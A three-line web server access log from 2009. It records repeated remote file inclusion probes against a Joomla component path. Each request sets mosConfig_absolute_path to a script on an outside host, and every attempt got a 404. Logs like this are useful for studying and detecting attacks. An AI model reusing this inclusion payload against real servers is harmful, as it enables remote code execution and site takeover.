121.165.73.157 - - [28/Apr/2009:10:17:00 -0700] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:17:00 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:17:01 -0700] "GET /logs/access_081107.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
